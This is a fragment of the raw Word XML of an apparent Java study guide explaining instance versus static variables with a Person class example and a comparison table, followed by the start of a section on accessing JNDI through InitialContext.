          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a variable that belongs to an individual instance of a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF3DF9" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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very object (instance) of the class has its own copy of instance variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E937CC" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745E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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430E6BBE" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Allocation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instance variables are stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Heap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and each object gets its own copy of the instance variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4841AD" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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bject-level Variable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instance variables are specific to each object created from the class. They can have different values for different instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0C41AB" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ault Value:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If not explicitly initialized, instance variables are assigned default values (e.g., null for objects, 0 for numeric types, false for boolean).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77402352" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instance variables are accessed via object references (i.e., through an instance of the class).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7297F7B3" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745E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Usage Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B06720E"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51526FCE"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Instance variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6298212D"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013DB868"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age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D82754" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A69882C"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erson(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D99F04D"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name = name; // Instance variable 'name' is unique to each object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A49E9A"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age = age;   // Instance variable 'age' is unique to each object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2765519D"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4F8BB70" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="053BBBDD"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display() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA2D0A5"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Name: " + name + ", Age: " + age);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042B2F19"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7BA8DCE"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ADEC266" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED47D1F"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public class Main {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D105B2"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35D46C2F"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erson person1 = new Person("Alice", 30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31471DD8"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erson1.display();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1050A7FC" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01493116"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erson person2 = new Person("Bob", 25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FECD7DB"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erson2.display();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C21D59B"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90C9A03"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37D44ED" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C9F7CA" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>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ame: Alice, Age: 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A33C2FF" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>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ame: Bob, Age: 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECC7678" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745E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to Use Instance Variables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E9BE86" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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bject-specific Data:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When each object needs to have its own copy of data, such as name, age, salary, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063EE7EF" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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ifferent Values for Different Objects:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When different instances of a class require different values for the same property.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365479B7" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D745E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0AE2CC">
          <v:rect id="_x0000_i1204" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE3CAB" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745E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Differences Between Static and Instance Variab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87"/>
        <w:gridCol w:w="3665"/>
        <w:gridCol w:w="3760"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="2E1FDF70" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FFA4822" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745E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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FAE1C49" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745E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atic Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="558017DA" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745E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stance Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="44171A18" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17CB8BFB"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longs To</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76C5C9D0"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shared among all instances)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CDC2228"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stance (unique to each object)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="0C5813B5" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4550E216"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Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AFE37E3"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ored in </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Method Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15B2EDC3"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ored in </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Heap memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="0195C3AE" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29F8AD45"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="441BF17B"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be accessed by class name or object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F0BC51C"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only be accessed by object reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="68BBE9F6" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69808B1A"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ault Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03655AB0"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fault values (e.g., 0, null)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6254C2A4"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fault values (e.g., 0, null)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="4814E499" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C0B8126"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30664F2B"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hared data for all objects of the class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FF7FF95"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ata specific to individual objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="7D031BD7" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6492A9E1"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itialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="698C16F2"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itialized once when the class is loaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E592592"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itialized when an object is created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D745EE" w:rsidRPr="00CE4B95" w14:paraId="70C17F4B" w14:textId="77777777" w:rsidTr="002F1A2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B500415"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47B998EF"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tic int count;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="362CD3AE" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745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 age;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A3D4C38" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D745E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1AB6DBF">
          <v:rect id="_x0000_i1205" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA1D072" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745E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56C65F8F" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used for values that need to be shared by all instances of a class. They belong to the class itself and are often used for tracking things like counters or common settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134CC8FE" w14:textId="77777777" w:rsidR="002F1A2F" w:rsidRPr="00CE4B95" w:rsidRDefault="002F1A2F" w:rsidP="00D745EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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tance Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used for values that are specific to each object. They belong to individual instances of the class and each object can have different values for them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E585C8B" w14:textId="1EEE797C" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00342FA5">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1F03588">
          <v:rect id="_x0000_i1206" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D550619" w14:textId="77777777" w:rsidR="00806A73" w:rsidRPr="00CE4B95" w:rsidRDefault="00806A73" w:rsidP="00342FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C5C0FE6" w14:textId="77777777" w:rsidR="00806A73" w:rsidRPr="00CE4B95" w:rsidRDefault="00806A73" w:rsidP="00342FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C97FD7B" w14:textId="77777777" w:rsidR="00806A73" w:rsidRPr="00CE4B95" w:rsidRDefault="00806A73" w:rsidP="00342FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D7CD30" w14:textId="55EF79C0" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF49CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc196307548"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will you access JNDI in java code</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="7F423282" w14:textId="7AC38402" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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ccessing JNDI in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2998A342"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NDI (Java Naming and Directory Interface) is an API provided by Java to access different types of naming and directory services, such as DNS, LDAP, RMI registry, and file systems. JNDI is typically used in Java EE applications for accessing resources like databases, JMS connections, and EJBs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBBE288"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s how to access JNDI resources in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EE6727" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2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Setup JNDI in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F824A6"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fore accessing JNDI resources, you need to ensure the JNDI provider is correctly configured. This is typically done by creating a Context object and looking up resources using a name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA2DA34"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s a basic outline of how to access JNDI in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3199FE4B" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F35A2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CBBE80">
          <v:rect id="_x0000_i1207" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBD5165" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2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eps to Access JNDI Resource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E87AD7" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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reate an InitialContext Object:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD5A5A" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45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o access a JNDI provider, you first need to create an instance of the InitialContext class. It is the entry point for the JNDI lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70401D23" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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erform a Lookup:</w:t>
      </w:r>
    </w:p>
